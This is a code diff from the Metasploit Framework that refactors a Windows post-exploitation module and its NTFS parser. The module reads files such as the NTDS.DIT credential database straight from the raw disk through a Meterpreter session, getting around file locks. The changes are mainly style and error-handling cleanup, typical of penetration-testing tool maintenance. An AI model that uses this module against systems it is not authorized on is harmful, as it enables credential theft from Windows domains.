diff --git a/lib/rex/parser/fs/ntfs.rb b/lib/rex/parser/fs/ntfs.rb index 1a35188e63..eacc69a6b7 100644 --- a/lib/rex/parser/fs/ntfs.rb +++ b/lib/rex/parser/fs/ntfs.rb @@ -236,7 +236,7 @@ module Rex def file(path) repertory = mft_record_from_mft_num(5) index_entry = {} - for r in path.split('\\') + path.split('\\').each do |r| attributes = mft_record_attribute(repertory) index = index_list_from_attributes(attributes) unless index.key?(r) diff --git a/modules/post/windows/gather/file_in_raw_ntfs.rb b/modules/post/windows/gather/file_in_raw_ntfs.rb index 702bb326ec..c8187ac31b 100644 --- a/modules/post/windows/gather/file_in_raw_ntfs.rb +++ b/modules/post/windows/gather/file_in_raw_ntfs.rb @@ -3,26 +3,27 @@ # Current source: https://github.com/rapid7/metasploit-framework ## +require 'rex/parser/fs/ntfs' + class Metasploit3 < Msf::Post include Msf::Post::Windows::Priv - require "rex/parser/fs/ntfs" def initialize(info = {}) super(update_info(info, 'Name' => 'Windows File Gathering In Raw NTFS', - 'Description' => %q{ + 'Description' => %q( This module gather file using the raw NTFS device, bypassing some Windows restriction. Gather file from disk bypassing restriction like already open file with write right lock. - Can be used to retreive file like NTDS.DIT - }, + Can be used to retreive file like NTDS.DIT), 'License' => 'MSF_LICENSE', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], - 'Author' => ['Danil Bazin '], #@danilbaz + 'Author' => ['Danil Bazin '], # @danilbaz 'References' => [ [ 'URL', 'http://www.amazon.com/System-Forensic-Analysis-Brian-Carrier/dp/0321268172/' ] ] )) + register_options( [ OptString.new('FILE_PATH', [true, 'The FILE_PATH to retreive from the Volume raw device', nil]) @@ -32,46 +33,46 @@ class Metasploit3 < Msf::Post def run winver = sysinfo["OS"] - if winver =~ /2000/i - print_error("Module not valid for Windows 2000") - return - end - - unless is_admin? - print_error("You don't have enough privileges") - return - end + fail_with(Exploit::Failure::NoTarget, 'Module not valid for Windows 2000') if winver =~ /2000/ + fail_with(Exploit::Failure::NoAccess, 'You don\'t have administrative privileges') unless is_admin? file_path = datastore['FILE_PATH'] r = client.railgun.kernel32.GetFileAttributesA(file_path) if r['GetLastError'] != 0 - print_error("The file does not exist, use file format C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts") - return nil + fail_with( + Exploit::Failure::BadConfig, + 'The file does not exist, use file format C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts' + ) end drive = file_path[0, 2] - r = client.railgun.kernel32.CreateFileA("\\\\.\\#{drive}", "GENERIC_READ", "FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE", - nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0) + r = client.railgun.kernel32.CreateFileA("\\\\.\\#{drive}", + 'GENERIC_READ', + 'FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE', + nil, + 'OPEN_EXISTING', + 'FILE_FLAG_WRITE_THROUGH', + 0) if r['GetLastError'] != 0 - print_error("Error opening #{drive} GetLastError=#{r['ErrorMessage']}") - return nil + fail_with( + Exploit::Failure::Unknown, + "Error opening #{drive}. Windows Error Code: #{r['GetLastError']} - #{r['ErrorMessage']}") end + @handle = r['return'] print_status("Successfuly opened #{drive}") begin fs = Rex::Parser::NTFS.new(self) - print_status("Trying gather #{file_path}") + print_status("Trying to gather #{file_path}") path = file_path[3, file_path.length - 3] data = fs.file(path) file_name = file_path.split("\\")[-1] stored_path = store_loot("windows.file", 'application/octet-stream', session, data, file_name, "Windows file") print_good("Saving file : #{stored_path}") - rescue ::Exception => e - print_error("Post failed : #{e.backtrace}") ensure client.railgun.kernel32.CloseHandle(@handle) end